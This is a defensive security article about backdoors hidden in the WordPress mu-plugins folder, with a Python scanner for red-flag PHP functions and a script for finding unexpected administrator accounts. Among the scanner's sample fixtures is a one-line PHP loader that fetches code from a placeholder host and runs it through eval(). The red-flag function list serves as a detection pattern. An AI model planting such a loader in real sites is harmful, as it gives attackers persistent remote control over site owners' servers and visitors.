
The Silent Threat: How Hackers Hide Backdoors in Your WordPress mu-Plugins Folder
As a WordPress site owner, you know that security is a constant battle. You keep your plugins updated, use strong passwords, and maybe even have a security plugin running. But what if a backdoor was hiding in a place you rarely, if ever, check? Hackers are increasingly targeting a specific, powerful part of your WordPress installation: the mu-plugins folder.
This folder, short for “Must-Use Plugins,” is a prime location for malicious code because any plugin placed here is automatically activated and cannot be disabled from the WordPress admin dashboard. This gives attackers a persistent, hidden foothold on your website that can be difficult to detect.
Understanding how this attack works is the first step toward protecting your site.
What Are mu-Plugins and Why Are They a Target?
The wp-content/mu-plugins/ directory is a special feature in WordPress. Unlike regular plugins that you install and activate through the dashboard, any PHP file placed in this folder is executed automatically on every page load. Legitimate developers use this for core site functionality that should always be running.
However, this “always on” nature makes it an ideal hiding spot for malware. An attacker who gains access to your file system can drop a malicious file here, and it will immediately start running. Since it doesn’t appear in your regular plugin list, you could have a backdoor active for months without ever knowing it.
Anatomy of a mu-Plugins Backdoor
The attacks we’re seeing are both simple and clever. They don’t place a large, obvious malware file on your server. Instead, they use a small, discreet “loader” file.
Here’s how the infection unfolds:
1. The Malicious Loader: The attacker places a single, seemingly harmless PHP file inside your wp-content/mu-plugins/ folder. The file might have an innocent-sounding name like db-options.php or security.php to avoid suspicion.
2. Fetching the Payload: This small loader file contains a critical piece of code, often using the PHP function file_get_contents(). This function is instructed to connect to a remote, third-party server (like Pastebin or a custom attacker-controlled domain) and download the actual malicious code.
3. Executing the Code: Once the malicious payload is downloaded, the loader file uses another dangerous function, eval(), to execute it directly. The eval() function is a major security risk because it runs any code given to it as if it were part of the original file. To hide their tracks, attackers often obfuscate this code using functions like base64_decode(), making it unreadable at a glance.
The result is a fully functional backdoor on your site. The attacker can now gain administrator access, inject spam links into your footer, redirect your visitors to malicious websites, or use your server to attack other sites—all while the source of the infection remains hidden from your view in the admin dashboard.
How to Find and Remove This Hidden Malware
If you suspect your site might be compromised or want to perform a proactive check, you need to look at your site’s files directly.
Step 1: Inspect Your mu-Plugins Folder
Using an FTP client or the File Manager in your hosting control panel, navigate to the wp-content/mu-plugins/ directory. This folder may not exist on all WordPress installations, but if it does, examine its contents carefully. Look for any files you don’t recognize or didn’t put there yourself.
Step 2: Scrutinize Suspicious Files
Open any suspicious PHP files in a text editor. You don’t need to be a developer to spot the red flags. Look specifically for the following functions:
- eval()
- base64_decode()
- file_get_contents()
- gzuncompress()
- str_rot13()
If you see these functions, especially when combined with strange, unreadable text or URLs pointing to external websites, you have likely found a backdoor.
Step 3: Delete the Malicious File
The solution is straightforward: simply delete the malicious PHP file from the mu-plugins folder. Once the file is gone, the backdoor is closed.
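Steps 1 and 2 above (open every PHP file in wp-content/mu-plugins/ and look for the five red-flag functions or external URLs) can be automated, and the same check catches the loader shape described in the "Anatomy" section: a remote fetch feeding eval(). The scanner below is an added example written for this article, not code from the article or from WordPress. It only reports; deleting a file (Step 3) stays a manual decision after you have read it. The sample files it scans are constructed fixtures with a placeholder `.invalid` domain, not real infections.

```python
"""Scan a WordPress mu-plugins directory for the red-flag functions.

Added example, not part of the original article. Walks a directory, reports every
.php file that references eval()/base64_decode()/file_get_contents()/
gzuncompress()/str_rot13() or an external URL, and marks the combination of a
remote fetch with eval() as a likely loader. Nothing is deleted.
"""
import os
import re
import tempfile

# The five functions the article lists as red flags.
RED_FLAG_FUNCTIONS = ("eval", "base64_decode", "file_get_contents",
                      "gzuncompress", "str_rot13")
FUNC_RE = re.compile(r"\b(" + "|".join(RED_FLAG_FUNCTIONS) + r")\s*\(")
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def scan_php_source(source):
    """Return flagged function names, external URLs and a loader verdict for one PHP source string."""
    functions = sorted(set(m.group(1) for m in FUNC_RE.finditer(source)))
    urls = sorted(set(URL_RE.findall(source)))
    # A remote fetch (file_get_contents or a URL) feeding eval() is the loader pattern.
    likely_loader = "eval" in functions and ("file_get_contents" in functions or bool(urls))
    return {"functions": functions, "urls": urls, "likely_loader": likely_loader}


def scan_mu_plugins(directory):
    """Scan every .php file under `directory`; return {relative_path: findings} for files with a hit."""
    findings = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                result = scan_php_source(fh.read())
            if result["functions"] or result["urls"]:
                findings[os.path.relpath(path, directory)] = result
    return findings


# Constructed sample files (not taken from any real infection) to exercise the scanner.
SAMPLE_FILES = {
    # A legitimate must-use plugin: nothing to flag.
    "site-tweaks.php": "<?php\nadd_filter('xmlrpc_enabled', '__return_false');\n",
    # The loader shape the article describes, with a placeholder URL.
    "db-options.php": "<?php\n@eval(base64_decode(file_get_contents('https://paste.invalid/raw/x')));\n",
    # A legitimate use of one flagged function on its own: reported for review, not a loader.
    "cache-helper.php": "<?php\n$data = gzuncompress(get_transient('cached_blob'));\n",
}


def demo():
    """Write the samples to a temporary directory, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLE_FILES.items():
            with open(os.path.join(tmp, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_mu_plugins(tmp)


if __name__ == "__main__":
    # On a real site, call scan_mu_plugins("/path/to/wp-content/mu-plugins") instead.
    for path, result in demo().items():
        verdict = "LIKELY LOADER" if result["likely_loader"] else "review"
        print(f"{path}: {verdict} functions={result['functions']} urls={result['urls']}")
```

Point scan_mu_plugins() at your own wp-content/mu-plugins/ path to use it for real. A hit on a single function such as gzuncompress() is only a prompt to read the file; the "LIKELY LOADER" verdict is reserved for the fetch-plus-eval combination, which is the pattern that warrants deletion.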
Essential Security Steps After a Cleanup
Removing the malware is just the first step. You must assume the attacker had full control of your site and take immediate action to secure it.
- Change All Passwords: This is non-negotiable. Immediately change your WordPress admin passwords, database passwords, FTP passwords, and your hosting account password.
- Update Everything: Ensure your WordPress core, all themes, and all plugins are updated to their latest versions to patch any vulnerabilities that may have allowed the initial intrusion.
- Scan Your Entire Site: Use a reputable security plugin like Wordfence or Sucuri Scanner to perform a deep scan of all your website files. This will help you find any other backdoors or malicious code the attacker may have left behind.
- Review User Accounts: Check for any new or unauthorized administrator accounts in your WordPress Users panel and delete them immediately.
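The "Review User Accounts" step can also be done at the database level, which complements the Users panel view. WordPress stores each user's role as a PHP-serialized array in wp_usermeta under the meta key `<prefix>capabilities` (`wp_capabilities` with the default `wp_` prefix), so administrators can be listed with one join against wp_users. The script below is an added example, not from the article or from WordPress itself; it runs the query against an in-memory SQLite copy of the two tables with constructed rows, and the same SQL works against a live MySQL database with your real table prefix.

```python
"""List administrator accounts from WordPress user tables.

Added example, not part of the original article. Uses an in-memory SQLite copy of
wp_users and wp_usermeta with constructed rows so it runs offline; on a real site,
run ADMIN_QUERY (with your table prefix) through your usual MySQL client.
"""
import sqlite3

# Constructed sample rows. The capability value is the PHP-serialized array
# WordPress stores under meta_key 'wp_capabilities'.
SAMPLE_USERS = [
    (1, "owner", "owner@example.com", "2021-03-02 10:00:00"),
    (2, "editor_jane", "jane@example.com", "2022-06-14 09:30:00"),
    (3, "wp_support", "x@mail.invalid", "2024-11-05 03:12:44"),
]
SAMPLE_USERMETA = [
    (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
    (3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
]

# Administrators registered on or after a cutoff, newest first. The quoted
# "administrator" pattern matches the serialized s:13:"administrator" entry.
ADMIN_QUERY = """
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM wp_users AS u
JOIN wp_usermeta AS m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities'
  AND m.meta_value LIKE '%"administrator"%'
  AND u.user_registered >= ?
ORDER BY u.user_registered DESC
"""


def build_sample_db():
    """Create the two tables in memory and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT,
                               user_email TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);
    """)
    conn.executemany("INSERT INTO wp_users VALUES (?,?,?,?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO wp_usermeta VALUES (?,?,?)", SAMPLE_USERMETA)
    return conn


def list_admins(conn, registered_since="1970-01-01 00:00:00"):
    """Return [(ID, login, email, registered)] for administrators registered on or after the cutoff."""
    return conn.execute(ADMIN_QUERY, (registered_since,)).fetchall()


def unexpected_admins(conn, known_logins, registered_since="1970-01-01 00:00:00"):
    """Administrators whose login is not on the list of accounts you created yourself."""
    known = set(known_logins)
    return [row for row in list_admins(conn, registered_since) if row[1] not in known]


if __name__ == "__main__":
    db = build_sample_db()
    # 'owner' is the only administrator the site owner recognises in this sample.
    for user_id, login, email, registered in unexpected_admins(db, ["owner"]):
        print(f"unexpected administrator: id={user_id} login={login} email={email} registered={registered}")
```

Keep the list of administrator logins you created yourself outside the database (a note in your runbook is enough); after a cleanup, any administrator not on that list, and especially one registered around the time of the intrusion, is the account to delete.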
By regularly monitoring all of your site’s files—not just the ones you can see in the dashboard—you can stay one step ahead of attackers. Don’t let your mu-plugins folder become a blind spot in your security strategy.
Source: https://securityaffairs.com/180311/malware/stealth-backdoor-found-in-wordpress-mu-plugins-folder.html